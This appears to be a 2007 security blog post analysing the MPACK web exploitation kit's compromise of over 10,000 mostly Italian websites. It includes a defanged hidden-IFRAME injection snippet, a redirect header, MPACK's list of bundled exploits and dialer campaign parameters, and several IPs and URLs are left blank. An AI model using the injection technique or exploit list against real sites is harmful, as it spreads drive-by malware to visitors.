Wednesday, June 20, 2007

Massive Embedded Web Attack in Italy

The Web is abuzz with news stories regarding the MPACK web exploitation kit installed on over 10,000 mostly Italian based sites, and in the spirit of previous analyses of malicious URLs here's an overview of the strategy of the attack, the outcome, and IPs in quesiton, thus the ones that should get blacklisted or CYBERINT applied for further juicy details on the severity of the attack.

The strategy of the attack
Picture yourself in the position of a malicious attacker wanting to infect the highest number of PCs possible in the shortest timeframe. How would you go for infecting the highest possible proportion of internet surfers using outdated software, ones still living in the "don't open .exe attachments" self-vigilance world? You'll either figure out a way to exploit vulnerabilities within a huge number of web sites and automatically embed the malicious payload, or breach a shared hosting provider and infect all of its customer, thus potentially infecting all of their future visitors. Which is exactly what happened in the most recent case of what's turning into a massive epidemic of MPACK embedded sites.

The outcome of the attack
- Over 10,000 sites affected according to WebSense
- hundreds of thousands PCs currently infected according to obtained MPACK statistics
- the majority of infected PCs are located in Italy given the breach of the shared hosting provider Aruba

Dissecting the attack
It all started when popular Italian sites had the following IFRAME embedded within their front pages :

name='StatPage' src='hllp://' width=5 height=5

The entire attack is currently orbiting around the following IPs :

Input URL:
Effective URL: hllp://
Responding IP:
HTTP/1.1 302 Moved TemporarilyServer: nginx/0.5.17
Date: Tue, 19 Jun 2007 22:56:01 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: hllp://

More coverage :
ISC, Symantec, WebSense, TrendMicro, Finjan -- great to see they came across my analysis of as well -- PandaLabs.


MPACK's Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits available in the latest 0.90 release of the web exploitation kit :

- modified MS06-014
- MS06-006 Firefox 1.5.x Opera 7.x
- 0day Win2000 (ms06-044)
- XML overflow under XP2k3
- WebViewFolderIcon overflow
- WinZip ActiveX overflow
- QuickTime overflow
- ANI overflow

The majority of news articles I came across to are emphasizing that the kit is available for sale at $1000. True, but only if you're purchasing it from the original source, namely, the kit has been a commodity for quite a while, with different propositions modifying the source code and selling it for much less, even bargaining with it in case someone's interested in the associated in the related underground services offered.

Even more ironic in the case of this particular attack is that while performing the cyber forensics part, I came across another malicious site farm hosting dialers courtesy of CARPEDIEM. And while the IFRAME part of the massive embedded Italy based attack was gone in the time of checking the dialers, even previous instances of CoolWebSearch were still in place. The second malicious campaign is run via, campaign id = 15682, all the p0rn sites at which is hosting all the dialers-embedded sites in question. From another perspective the benefits of infecting a web sites farm run on a single IP with probably hundreds of thousands of visitors in the shortest timeframe possible, has a major flaw, blocking aka CARPEDIEM, which is a matter of fact listed by Google as a harmful site will temporarily mitigate the threat.

Initiating traceback of a site that's participating in two malicious campaigns :

1 -> hllp://
Responding IP:

2 -> Sites spreading the dialers within :

Responding IP:

Dynamics of infection :

basically, the host name is identical with the distributed .exe's

My_Param['rf'] = "AnalReamV2KTU";
My_Param['id_produit'] = 550;
My_Param['id_site'] = 995;
My_Param['synergie'] = 'h';
My_Param['color'] = 'fire';
My_Param['name_kit'] = "AnalReam.exe"

Here's the entire campaign list :

Situational awareness at its best is what truly matter at the bottom line.